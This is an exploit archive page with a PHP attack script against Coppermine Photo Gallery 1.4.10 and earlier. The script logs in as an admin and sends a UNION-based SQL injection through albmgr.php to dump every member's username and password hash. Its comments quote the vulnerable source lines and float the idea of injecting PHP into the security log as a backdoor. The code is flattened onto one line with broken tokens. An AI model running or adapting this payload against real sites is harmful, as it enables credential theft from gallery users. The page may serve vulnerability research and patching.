Coppermine Photo Gallery <= 1.4.10 SQL Injection Exploit

2007.01.09
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); if($argc < 4) { print "n---------------------------------------------------------"; print "nAffected.scr..: Coppermine Photo Gallery <= 1.4.10"; print "nPoc.ID........: 19070104"; print "nType..........: SQL Injection"; print "nRisk.level....: Medium"; print "nSrc.download..: coppermine-gallery.net"; print "nPoc.link......: acid-root.new.fr/poc/19070104.txt"; print "nCredits.......: DarkFig"; print "n---------------------------------------------------------"; print "nUsage.........: php xpl.php <url> <adminuser> <adminpass>"; print "nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>"; print "nExample.......: php xpl.php http://c.com/ admin passwd"; print "n---------------------------------------------------------n"; exit(1); } /*/ [0] => xpl.php [1] => http://localhost/cpg1410/ [2] => root [3] => toor [4] => localhost:8200 [5] => user:passwd /*/ $url=$argv[1];$adu=$argv[2]; $adp=$argv[3];$pxs=$argv[4]; $pxa=$argv[5]; $xpl = new phpsploit(); $xpl->agent("InternetExploiter"); $xpl->cookiejar(1); $xpl->allowredirection(1); print "nheader> ==============================================="; print "nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)"; print "nheader> ==============================================="; if(!empty($pxs)){ print "nstatus> Using a proxy $pxs"; $xpl->proxy($pxs); } if(!empty($pxa)){ print "nstatus> Basic proxy authentification $pxa"; $xpl->proxyauth($pxa); } /*/ Table prefix. /*/ print "nstatus> Searching the version"; $xpl->get($url.'include/index.html'); if(preg_match("#Coppermine version: ([0-9]*.[0-9]*.[0-9]*)#",$xpl->getcontent(),$matches)) print "nsploit> Coppermine version ".$matches[1]; else print "nsploit> Not found"; $table = !empty($matches[1]) ? 'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users'; /*/ If you have the admin cookie (but not the password), replace lines 73=>76 by $xpl->addcookie('yourcookie'); /*/ print "nstatus> Trying to get logged in"; $xpl->post($url."login.php?referer=index.php","username=$adu&password=$a dp&remember_me=1&submitted=Se+Connecter"); if(!preg_match("#color:red#",$xpl->getcontent())) print "nsploit> Done"; else die("nstatus> Exploit failedn"); /*/ (usermgr.php) ============= case 'group_alb_access' : if (isset($_GET['gid'])) $group_id = $_GET['gid']; $sql = "SELECT group_name FROM [...] WHERE group_id = $group_id [...]"; $result = cpg_db_query($sql); (db_ecard.php) ============== $start = isset($_REQUEST['start']) ? $_REQUEST['start'] : ''; [...] if (!$start) {$startFrom = '0';}else{$startFrom=$start;} [...] $result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection LIMIT $startFrom,$countTo"); (albmgr.php) ============ $cat = isset($_GET['cat']) ? ($_GET['cat']) : 0; if ($cat == 1) $cat = 0; if (GALLERY_ADMIN_MODE) { $result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY pos ASC"); (filename_to_title()) ===================== $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0; $albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...] $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr"); (del_titles()) ============== $albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0; $albstr = ($albumid) ? " WHERE aid = $albumid" : ''; $result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']} $albstr"); /*/ print "nstatus> Retrieving all members password"; $xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_p assword/**/from/**/$table/*"); if(preg_match_all("#<option value="album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl->getcontent(),$ma tches)) print "nsploit> Done"; else die("nstatus> Exploit failedn"); print "nsploit> +----------------------------------+----------+"; print "nsploit> | PASSWORD | USER |"; print "nsploit> +----------------------------------+----------+"; /*/ (init.inc.php) ============== $HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => '''); [...] if (is_array($_POST)) { // and GET, SERVER, REQUEST... foreach ($_POST as $key => $value) { if (!is_array($value)) $_POST[$key] = strtr(stripslashes($value), $HTML_SUBST); if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key); } ... that's why we use the html_entity_decode() function. I just wanted < for a remote php code execution sploit without admin rights :'(. When the admin view the security logs, it include "security.log.php"... (security.log.php) ================== [...] if (!defined('IN_COPPERMINE')) die(); ?> Denied privileged access to viewlog.php from user Guest at on January 4, 2007, 2:10 pm Failed login attempt with Username: <?php mail(you); [...] fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at 01:16 PM /*/ for($i=0;$i<count($matches[0]);$i++) { print "nsploit> | ".$matches[2][$i].' | '.html_entity_decode($matches[1][$i]); if($i==(count($matches[0])-1)){ print "nsploit> +----------------------------------+----------+n"; } } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top